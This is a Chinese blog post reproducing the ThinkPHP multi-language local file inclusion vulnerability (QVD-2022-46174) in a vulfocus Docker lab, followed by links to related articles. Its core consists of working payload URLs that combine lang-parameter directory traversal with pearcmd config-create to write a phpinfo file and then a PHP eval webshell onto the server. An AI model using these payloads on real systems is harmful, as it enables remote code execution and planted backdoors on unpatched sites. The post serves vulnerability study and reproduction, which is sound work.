ThinkPHP Lang多语言本地文件包含漏洞(QVD-2022-46174)漏洞复现

最新推荐文章于 2024-08-20 01:01:24 发布
最新推荐文章于 2024-08-20 01:01:24 发布
阅读量3.6k 收藏 7
点赞数 3
分类专栏: thinkphp thinkphp lang文件包含 漏洞复现 文章标签: php 开发语言 thinkphp thinkphp文件包含 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq1140037586/article/details/128355617
版权

1、漏洞描述

ThinkPHP是一个在中国使用较多的PHP框架。在其6.0.13版本及以前,存在一处本地文件包含漏洞。当ThinkPHP开启了多语言功能时,攻击者可以通过lang参数和目录穿越实现文件包含,当存在其他扩展模块如 pear 扩展时,攻击者可进一步利用文件包含实现远程代码执行。
影响版本

6.0.1 <= ThinkPHP <= 6.0.13
ThinkPHP 5.0.x
ThinkPHP 5.1.x

2、漏洞复现

使用vulfocus靶场复现漏洞,使用如下命令拉取镜像

docker pull vulfocus/thinkphp:6.0.12

启动靶场后,访问如下:
在这里插入图片描述
官方给出了访问路径:
在这里插入图片描述

访问如下地址:http://xxx.xx.230.165:59502/public/index.php
在这里插入图片描述
使用如下payload:

/public/index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=phpinfo()?>+/var/www/html/shell.php

在这里插入图片描述
访问写入的文件
在这里插入图片描述
写入一句话木马payload

/public/index.php?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/<?=eval(@$_POST['password']);?>+/var/www/html/shell2.php

在这里插入图片描述
验证结果如下:
在这里插入图片描述

ThinkPHP 多语言模块RCE漏洞复现
0xSec
12-25 3888
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。
ThinkPHP Lang文件包含To远程代码执行自动化验证脚本_CNVD-2022-86535
afei001
12-14 905
ThinkPHP Lang文件包含To远程代码执行自动化验证脚本_CNVD-2022-86535 来洛!
Thinkphp5~6多语言文件包含到rce漏洞复现and详细分析解析
君逍遥o
09-08 1938
Thinkphp5~6多语言文件包含到rce漏洞复现and详细分析解析
ThinkPHP5漏洞分析之文件包含
duoba_an的博客
08-14 1272
如果输入的数组中有相同的字符串键名,则该键名后面的值将覆盖前一个值。模板引擎中,在加载模版解析变量时存在变量覆盖问题,而且程序没有对数据进行很好的过滤,最终导致。这里使用的是nginx,所以将文件放在nginx文件夹下了,这都不重要,根据自己情况决定。将一个或多个数组的单元合并起来,一个数组中的值附加在前一个数组的后面。返回作为结果的数组。如果输入的数组存在以数字作为索引的内容,则这项内容的键名会以连续方式重新索引。仅在当前符号表中已有同名变量时,建立附加了前缀的变量名,其它的都不处理。
Thinkphp5.0.x 文件包含漏洞
weixin_61785633的博客
07-30 848
这个漏洞复现的不是很完善,按网上的教程,传入图片码是可以被解析为php文件,从而实现攻击,但是我尝试了几次都不成功,目前还不知道是为什么。
ThinkPHP Lang文件包含To远程代码执行漏洞复现—CNVD-2022-86535
afei001
12-14 1497
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。ThinkPHP存在命令执行漏洞,该漏洞是由于开启了多语言功能,对参数lang传参过滤不严谨,攻击者可利用该漏洞执行命令。本质是ThinkPHP在开启多语言功能的情况下存在文件包含漏洞,攻击者可以通过get、header、cookie等位置传入参数,ThinkPHP LoadLangPack中存在目录穿越漏洞,然后再利用pearcmd文件包含并结合它的指令config-create创建恶意代码,从而实现远程代码执行。
vulhub中ThinkPHP 多语言本地文件包含漏洞复现
yougexiaojiuguan的博客
03-06 595
漏洞复现的记录,
漏洞复现】CNVD-2022-86535-ThinkphpV6多语言
rm -rf *
01-18 3039
Thinkphp多语言模块漏洞远程命令执行
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP多语言文件包含RCE(QVD-2022-46174)
weixin_43610673的博客
01-10 2584
ThinkPHP6新版本补丁\think\middleware\LoadLangPack::detect`中增加了对url、Header、Cookie中设置语言的合法性检查。查看官方文档关于多语言的解释可见:会首先检查请求的URL或者Cookie中是否包含语言变量。在Docker任意版本镜像中,pcel/pear都会被默认安装,安装的路径在。需开启多语言选项,以thinkPHP6版本为例。方法会被自动加载(中间件的入口执行方法)在detect方法中设置语言之后进入。进行语言切换,路径直接拼接而成。
ThinkPHP多语言模块文件包含RCE复现详细教程
ALLEN'Blog
02-14 2283
1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、Google Hacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等3、操作系统基础(一周)
漏洞深度分析|Thinkphp 多语言 RCE
LJQClqjc的博客
12-12 1046
棱镜七彩漏洞深度分析
thinkphp 5.x~3.x 文件包含漏洞分析
weixin_30256505的博客
05-11 587
漏洞描述: ThinkPHP在加载模版解析变量时存在变量覆盖的问题,且没有对$cacheFile进行相应的消毒处理,导致模板文件的路径可以被覆盖,从而导致任意文件包含漏洞的发生。 主要还是变量覆盖的问题。 漏洞范围: 漏洞影响版本:5.0.0<=ThinkPHP5<=5.0.18、5.1.0<=ThinkPHP<=5.1.10 本地复现环境: ...
thinkphp5漏洞分析之文件包含
m0_68976043的博客
08-20 952
最后,再通过一张攻击流程图来回顾整个攻击过程。
solidity合约结构
Liuzhiwang29的博客
09-28 694
solidity 合约结构 什么是智能合约? 一种旨在以信息化方式传播、验证、或执行合同的计算机协议,它允许在没有第三方的情况下进行可信交易,这些交易可追踪且不可逆转。 从技术上,通常我们把在区块链上运行的程序称为智能合约 1. 一个简单的智能合约 下面我们用一个简单的智能合约作为示例,来看看智能合约的基本结构: pragma solidity ^0.5.11; contract Counter { uint count = 0; address owner; // ev
Thinkphp常见漏洞利用
未完成的歌~的博客
04-14 4333
ThinkPHP是一个开源,快速、简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007年元旦正式更名为ThinkPHP。使用面向对象的开发结构和MVC模式,融合了Struts的思想和TagLib(标签库)、RoR的ORM映射和ActiveRecord模式。ThinkPHP可以支持windows/Unix/Linux等服务器环境,正式版需要PHP 5.0以上版本,支持MySql、PgSQL、Sqlite多种数据库以及PDO扩展,是一款跨平台,跨版本以及简单易用的PHP框架。
ThinkPHP文件包含,远程执行漏洞分析
Fiverya的博客
12-13 1644
文件包含,代码执行漏洞漏洞编号:QVD-2022-46174
thinkphp lang命令执行(QVD-2022-46174)漏洞复现
weixin_54584489的博客
04-29 2233
ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。当ThinkPHP开启多语言功能,并且存在扩展pear时,攻击者可以构造lang参数实现远程代码执行。本次漏洞复现,是建立在前人的基础上的,整个过程没有遇到太大问题,总体收获就是感受了一把该漏洞,以及复习了前面学习到的一句话木马,同时扩展了一些小知识点。将思绪代入最初的漏洞发现者,才明白知识储备对挖洞者的重要性。
thinkphp5文件包含漏洞复现
最新发布
04-03
### ThinkPHP5 文件包含漏洞复现教程 #### 背景介绍 ThinkPHP 是一款流行的 PHP 开源框架,广泛应用于 Web 应用开发。然而,在某些特定条件下,该框架可能存在严重的安全漏洞。例如,当启用多语言功能或模板引擎未...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值